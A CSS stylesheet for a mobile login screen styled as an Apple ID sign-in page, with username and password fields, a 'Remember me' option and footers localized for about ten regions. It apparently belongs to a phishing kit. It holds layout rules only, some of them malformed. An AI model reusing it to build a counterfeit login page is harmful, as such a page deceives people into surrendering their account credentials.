#i1,
#i2 {
    width: 25px;
    z-index: 999
}

#i1,
#i2,
#i3 {
    z-index: 999
}

#clfooter_m_login,
#cnfooter_m_login,
#esfooter_m_login,
#frfooter_m_login,
#jpfooter_m_login,
#defooter_m_login,
#thfooter_m_login,
#nlfooter_m_login,
#myfooter_m_login,
#xfooter_m_login {
    height: 80%;
    background-size: 100%, 100%;
    background-repeat: no-repeat;
    background-position: center;
    top: 500px;
    left: 5%
}

#Apple_ID_m_login,
#i2,
#i3 {
    position: absolute;
    top: 10px
}

#Apple_ID_m_login,
#bottom_m_login,
#clfooter_m_login,
#cnfooter_m_login,
#container_m_login,
#esfooter_m_login,
#frfooter_m_login,
#defooter_m_login,
#thfooter_m_login,
#nlfooter_m_login,
#myfooter_m_login,
#head_m_login,
#i1,
#i2,
#i3,
#jpfooter_m_login,
#sub_navbar_m_login,
#xcontent_m_login {
    position: absolute
}

#bottom_m_login {
    background-color: #000;
    opacity: .7;
    width: 100%;
    height: 50px;
    z-index: 55
}

#i1 {
    background-image: url(../img/i1.png);
    background-repeat: no-repeat;
    height: 12px;
    left: 20px;
    top: 20px
}

#i2 {
    background-image: url(../img/i2.png);
    background-repeat: no-repeat;
    height: 29px;
    left: 50%;
    margin-left: -17.5px
}

#i3 {
    background-image: url(../img/i3.png);
    background-repeat: no-repeat;
    width: 20px;
    height: 26px;
    right: 20px
}

#container_m_login {
    top: 0;
    left: 50%;
    width: 330px;
    margin-left: -165px
}

#xheader_m_login {
    width: 100%;
    height: 400px;
    top: 0
}

.error {
    background-color: #fefdd2
}

#sub_navbar_m_login {
    width: 100%;
    height: 61px;
    top: 44px;
    left: 0;
    z-index: 3
}

#head_m_login {
    width: 100%;
    height: 500px;
    top: 0;
    left: 0;
    z-index: 1;
    background-image: url(../img/login-mobile.png);
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat
}

#xfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile.png);
    position: absolute
}

#cnfooter_m_login {
    width: 100%;
    background-image: url(../img/footer-login-mobile-cn.png)
}

#jpfooter_m_login {
    width: 100%;
    background-image: url(../img/footer-login-mobile-jp.png)
}

#frfooter_m_login {
    width: 100%;
    background-image: url(../img/footer-login-mobile-fr.png)
}

#esfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-es.png)
}

#clfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-cl.png)
}

#defooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-de.png)
}

#thfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-th.png)
}

#nlfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-nl.png)
}

#myfooter_m_login {
    width: 90%;
    background-image: url(../img/footer-login-mobile-my.png)
}

#xcontent_m_login {
    top: 130px;
    width: 90%;
    min-width: 330px;
    height: 440px;
    z-index: 4
}

#Apple_ID_m_login {
    font-size: 45px;
    font-family: Arial;
    color: #fff;
    line-height: .964;
    text-align: center;
    z-index: 5;
    width: 100%
}

@font-face {
    font-family: Myriad;
    src: url(31642.ttf);
    font-weight: 300
}

#Manage_Account_m_login {
    font-size: 24px;
    font-family: Myriad, "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;
    color: #fff;
    text-align: center;
    position: absolute;
    top: 90px;
    width: 100%;
    z-index: 5
}

#xpass_m_login,
#xuser_m_login {
    border-width: 1px;
    border-color: #fff;
    border-style: solid;
    width: 100%;
    height: 43px;
    left: 0;
    padding-left: 10px;
    font-family: Myriad, "Helvetica Neue", Helvetica, Arial, Verdana, serif;
    font-size: 18px;
    font-weight: 400;
    box-shadow: inherit;
    -webkit-font-smoothing: antialiased;
    position: absolute;
    letter-spacing: .2px
}

#xuser_m_login {
    border-top-left-radius: 6px;
    border-top-right-radius: 6px;
    top: 132px
}

#xpass_m_login:focus,
#xuser_m_login:focus {
    border-color: #3c9fea;
    outline: 0
}

#xpass_m_login {
    border-bottom-left-radius: 6px;
    border-bottom-right-radius: 6px;
    top: 176px
}

#xbtn_m_login {
    border: 0;
    width: 29px;
    height: 28px;
    z-index: 6;
    top: 185px;
    right: 5px;
    position: absolute;
    cursor: pointer;
    display: block
}

#xXxLogin {
    width: 90%;
    height: 60px;
    position: absolute;
    left: 5%
}

#bukapass_m_login {
    border: 0;
    width: 29px;
    height: 28px;
    z-index: 6;
    top: 185px;
    right: 5px;
    position: absolute;
    cursor: pointer;
    display: block
}

#xXxLogin {
    width: 90%;
    height: 60px;
    position: absolute;
    left: 5%
}

.xbtn1_m_login {
    background: url(../img/btn.png)
}

.xbtn2_m_login {
    background: url(../img/btn2.png)
}

#Remember_me_m_login {
    font-size: 14px;
    letter-spacing: .2px;
    font-family: "Myriad Set Pro", "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;
    color: #fff;
    top: 250px;
    left: 120px;
    position: absolute
}

.optiona,
.optiona2 {
    position: absolute;
    width: 15px;
    height: 15px;
    top: 252px;
    left: 100px
}

.optiona {
    background: url(../img/unchecked.png) no-repeat
}

.optiona2 {
    background: url(../img/checked.png) no-repeat
}

#Forgot_Apple_ID_m_login,
#Forgot_Apple_ID_m_login:hover {
    left: 50px;
    font-size: 14px;
    font-family: Arial;
    color: #fff;
    top: 340px;
    position: absolute
}

#Forgot_Apple_ID_m_login:hover {
    text-decoration: underline;
    cursor: pointer
}

#Forgot_Apple_ID_m_login:focus {
    font-size: 14px;
    font-family: Arial;
    color: #fff;
    top: 340px;
    left: 85px;
    position: absolute;
    text-decoration: underline;
    cursor: pointer
}

#loading_m_login {
    width: 28px;
    height: 28px;
    position: absolute;
    border: 0;
    background: url(../img/33.gif);
    z-index: 6;
    top: 185px;
    right: 5px;
    display: none
}

#loading_m_login1 {
    width: 28px;
    height: 28px;
    position: absolute;
    border: 0;
    background: url(../img/33.gif);
    z-index: 6;
    top: 185px;
    right: 5px;
    display: none
}

.fade-in1 {
    -webkit-animation: fade-in 1s ease-in-out;
    -o-animation: fade-in 1s ease-in-out;
    animation: fade-in 1s ease-in-out
}

-moz-keyframes fade-in {
    fromopacity: 0
}

@-webkit-keyframes fade-in {
    from {
        opacity: 0
    }
    to {
        opacity: 1
    }
}

@-o-keyframes fade-in {
    from {
        opacity: 0
    }
    to {
        opacity: 1
    }
}

@-ms-keyframes fade-in {
    from {
        opacity: 0
    }
    to {
        opacity: 1
    }
}

to {
    opacity: 1
}

@keyframes fade-in {
    from {
        opacity: 0
    }
    to {
        opacity: 1
    }
}